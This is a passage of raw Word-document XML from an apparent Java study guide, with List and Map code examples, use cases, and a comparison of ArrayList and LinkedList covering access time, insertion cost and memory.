    <w:p w14:paraId="6A43794B"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39911FF1"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F833765" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F0E52C"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ListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F94ADC4"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75DAF771"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String&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C538F94"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7FF66"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDD5C8"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F1873" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A9AF7E"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List: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE6C10"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Element at index 1: " + list.get(1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20445BE2"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985BE2C"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ADD8C5B"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405E47F7"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List: [Apple, Banana, Apple]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB9E73"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lement at index 1: Banana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFAAC2B"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ap Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABDA57"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E42B06"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Map;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145362EB" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E068DC3"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pExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C795B1D"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16A9493F"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lt;String, Integer&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BA3F7"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Apple", 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E2FC4"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Banana", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB67EA"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Orange", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE63A2" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D11FB6"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Map: " + map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA4522"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Value for key 'Apple': " + map.get("Apple"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB1626"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D8D96C1"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BDD59FB"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1D35E"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p: {Apple=10, Banana=20, Orange=30}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA68740"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alue for key 'Apple': 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F94BD" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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6ADF47B">
          <v:rect id="_x0000_i1415" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A057B" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Use Case Scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A510C0A" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624792A1" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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need an ordered collection of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED110C3" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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need to store duplicate elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D06B8" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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need to access elements by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877A0AE"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 Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A List can be used for storing the history of user actions or maintaining an ordered list of students' names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BF2E6" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12824A88" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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need to store key-value pairs and perform fast lookups based on keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B720951" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Keys must be unique, and you want to associate values to those keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DC2DF5"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 Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Map can be used for storing student IDs (keys) with their corresponding names (values) or creating a dictionary with words as keys and definitions as values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBFF6D" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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A88D00C">
          <v:rect id="_x0000_i1416" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2AFE4" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82BFFA" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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st</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An ordered collection of elements (with duplicates allowed) that provides random access by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090BC74B" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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ap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A collection of key-value pairs where each key is unique, and you access elements based on keys rather than indices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E94A2F" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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oth List and Map serve different purposes depending on whether you need to handle collections of data or associate values to unique keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D08E13" w14:textId="5E0939BC" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FD404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8E75733">
          <v:rect id="_x0000_i1417" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA7E29" w14:textId="38A54E31" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc196307615"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between ArrayList and LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="3056D5BE" w14:textId="1E97146A" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F50F306" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">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Difference Between ArrayList and LinkedList in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87FA21"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oth ArrayList and LinkedList are implementations of the List interface in Java, but they have different underlying data structures and performance characteristics. Here's a detailed comparison between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E93B2BC" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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0E711DA">
          <v:rect id="_x0000_i1418" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C9BC2" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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Underlying Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67302390" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD12D18" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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backed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ArrayList is backed by a dynamic array. Internally, it uses an array to store elements, and when the array is full, it creates a larger array and copies the elements over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBBCD22" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B95BE8" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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 List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: LinkedList is implemented as a doubly linked list, where each element (node) contains a reference to the previous and next node. This allows easy insertion and removal of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C07A2DB" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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BA4B46E">
          <v:rect id="_x0000_i1419" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF81A8" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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2. Performance (Access Time):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641DB231" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249E96D" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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andom Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> performance for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>get()</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set()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations because it uses an array that supports direct access via an index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CDC74" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF23085" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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quential Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linear-time (O(n))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> performance for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>get()</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set()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations because it needs to traverse the list to reach the desired element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C4B1E" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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8AAD0CD">
          <v:rect id="_x0000_i1420" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A677D" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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Insertion and Deletion Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000D29F" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9CD7B0" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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on/Deletion at End</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Constant-time (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the array has enough capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B2614" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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on/Deletion in Middle</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Linear-time (O(n))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because elements need to be shifted to accommodate new elements or fill the gap left by removed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0A091" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCBBC9" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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on/Deletion at Ends</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Constant-time (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for both adding and removing elements at the beginning and end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731CD114" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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on/Deletion in Middle</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Constant-time (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you have a reference to the node, but finding the node takes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linear-time (O(n))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so overall it's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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338DDBE9" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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C193797">
          <v:rect id="_x0000_i1421" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A45FF" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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Memory Consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C2500" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434430EA" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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wer Memory Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ArrayList requires less memory because it only stores the data and the array's capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A155887" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1EC84" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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igher Memory Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each node in a LinkedList needs to store two references (previous and next), so it consumes more memory.</w:t>
